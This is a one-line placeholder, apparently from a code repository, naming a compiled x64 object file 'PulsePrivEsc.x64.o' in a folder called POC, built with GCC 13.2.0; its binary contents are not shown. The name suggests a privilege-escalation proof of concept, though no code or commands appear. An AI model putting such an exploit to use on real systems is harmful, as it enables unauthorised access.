POC / PulsePrivEsc.x64.o (compiled x64 object file, built with GCC 13.2.0; binary contents not rendered)